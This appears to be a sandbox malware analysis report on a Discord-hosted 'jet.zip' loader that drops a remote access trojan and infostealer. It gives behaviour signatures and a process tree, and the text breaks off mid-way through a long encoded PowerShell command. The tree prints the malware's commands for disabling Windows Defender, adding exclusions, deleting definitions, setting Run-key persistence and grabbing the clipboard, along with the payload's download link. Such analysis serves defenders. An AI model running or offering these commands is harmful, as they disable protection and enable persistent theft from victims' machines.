Analysis

  • max time kernel
    150s
  • max time network
    184s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12-07-2024 13:44

General

  • Target

    https://cdn.discordapp.com/attachments/1250327383010181161/1258646575874441356/jet.zip?ex=669207f8&is=6690b678&hm=d5e2c78322d5e564f7ce36782ec9e5b5ca4235455e3f20c5b52e52c43433931f&

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Contacts a large (1045) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 57 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 11 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:580
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        PID:976
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Drops file in System32 directory
      PID:636
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
      1⤵
        PID:732
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
        1⤵
          PID:892
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
          1⤵
            PID:352
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
            1⤵
              PID:368
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
              1⤵
                PID:1040
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1084
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                1⤵
                  PID:1100
                  • c:\windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2952
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3612
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservice -s nsi
                    1⤵
                      PID:1196
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1204
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                        1⤵
                          PID:1312
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                          1⤵
                            PID:1340
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservice -s EventSystem
                            1⤵
                              PID:1348
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                              1⤵
                                PID:1392
                                • c:\windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2660
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                  1⤵
                                    PID:1508
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                    1⤵
                                      PID:1520
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                      1⤵
                                        PID:1548
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                        1⤵
                                          PID:1596
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localservice -s netprofm
                                          1⤵
                                            PID:1688
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                            1⤵
                                              PID:1696
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1832
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1848
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                  1⤵
                                                    PID:1884
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                    1⤵
                                                      PID:1944
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:1516
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                        1⤵
                                                          PID:2104
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                          1⤵
                                                            PID:2152
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                            1⤵
                                                              PID:2356
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                              1⤵
                                                                PID:2368
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                1⤵
                                                                  PID:2392
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                  1⤵
                                                                    PID:2552
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2588
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2604
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2620
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                        1⤵
                                                                          PID:2628
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                          1⤵
                                                                            PID:2636
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2648
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                              1⤵
                                                                                PID:1772
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2344
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:3284
                                                                                  • C:\Windows\system32\LaunchWinApp.exe
                                                                                    "C:\Windows\system32\LaunchWinApp.exe" "https://cdn.discordapp.com/attachments/1250327383010181161/1258646575874441356/jet.zip?ex=669207f8&is=6690b678&hm=d5e2c78322d5e564f7ce36782ec9e5b5ca4235455e3f20c5b52e52c43433931f&"
                                                                                    2⤵
                                                                                      PID:1768
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_jet.zip\jet\loader.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_jet.zip\jet\loader.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2324
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_jet.zip\jet\loader.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp1_jet.zip\jet\loader.exe"
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4332
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI23242\Build.exe -pbeznogym
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2300
                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI23242\Build.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI23242\Build.exe -pbeznogym
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4500
                                                                                            • C:\ProgramData\Microsoft\hacn.exe
                                                                                              "C:\ProgramData\Microsoft\hacn.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3488
                                                                                              • C:\ProgramData\Microsoft\hacn.exe
                                                                                                "C:\ProgramData\Microsoft\hacn.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4152
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI34882\s.exe -pbeznogym
                                                                                                  8⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4728
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI34882\s.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI34882\s.exe -pbeznogym
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3784
                                                                                                    • C:\ProgramData\main.exe
                                                                                                      "C:\ProgramData\main.exe"
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4244
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9352.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9352.tmp.bat
                                                                                                        11⤵
                                                                                                          PID:8140
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            Tasklist /fi "PID eq 4244"
                                                                                                            12⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:9860
                                                                                                          • C:\Windows\system32\find.exe
                                                                                                            find ":"
                                                                                                            12⤵
                                                                                                              PID:9864
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              Timeout /T 1 /Nobreak
                                                                                                              12⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:9896
                                                                                                            • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                              12⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks processor information in registry
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5388
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                13⤵
                                                                                                                  PID:9936
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                    14⤵
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Modifies registry key
                                                                                                                    PID:6268
                                                                                                          • C:\ProgramData\svchost.exe
                                                                                                            "C:\ProgramData\svchost.exe"
                                                                                                            10⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1116
                                                                                                            • C:\ProgramData\svchost.exe
                                                                                                              "C:\ProgramData\svchost.exe"
                                                                                                              11⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Adds Run key to start application
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:5560
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                12⤵
                                                                                                                  PID:5744
                                                                                                            • C:\ProgramData\setup.exe
                                                                                                              "C:\ProgramData\setup.exe"
                                                                                                              10⤵
                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:4564
                                                                                                    • C:\ProgramData\Microsoft\based.exe
                                                                                                      "C:\ProgramData\Microsoft\based.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2716
                                                                                                      • C:\ProgramData\Microsoft\based.exe
                                                                                                        "C:\ProgramData\Microsoft\based.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4632
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                          8⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4784
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                            9⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:508
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                          8⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:5056
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                            9⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4596
                                                                                                          • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                            9⤵
                                                                                                            • Deletes Windows Defender Definitions
                                                                                                            PID:6604
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
                                                                                                          8⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4436
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
                                                                                                            9⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3448
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                          8⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:5020
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bound.exe
                                                                                                            bound.exe
                                                                                                            9⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1876
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\onefile_1876_133652655351209538\loader.exe
                                                                                                              bound.exe
                                                                                                              10⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:5428
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Contact robio.xyz | discord.gg/input for Help', 0, 'INPUT v2', 48+16);close()""
                                                                                                          8⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2676
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            9⤵
                                                                                                              PID:3060
                                                                                                            • C:\Windows\system32\mshta.exe
                                                                                                              mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Contact robio.xyz | discord.gg/input for Help', 0, 'INPUT v2', 48+16);close()"
                                                                                                              9⤵
                                                                                                                PID:360
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'"
                                                                                                              8⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4252
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'
                                                                                                                9⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5032
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                              8⤵
                                                                                                                PID:5636
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  tasklist /FO LIST
                                                                                                                  9⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:6000
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                8⤵
                                                                                                                  PID:6096
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                    9⤵
                                                                                                                      PID:6192
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                    8⤵
                                                                                                                      PID:6112
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell Get-Clipboard
                                                                                                                        9⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4728
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      8⤵
                                                                                                                        PID:3488
                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                          tasklist /FO LIST
                                                                                                                          9⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          PID:6184
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                        8⤵
                                                                                                                          PID:4948
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            9⤵
                                                                                                                              PID:5020
                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                              tree /A /F
                                                                                                                              9⤵
                                                                                                                                PID:1020
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                              8⤵
                                                                                                                                PID:1556
                                                                                                                                • C:\Windows\system32\systeminfo.exe
                                                                                                                                  systeminfo
                                                                                                                                  9⤵
                                                                                                                                  • Gathers system information
                                                                                                                                  PID:6204
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAa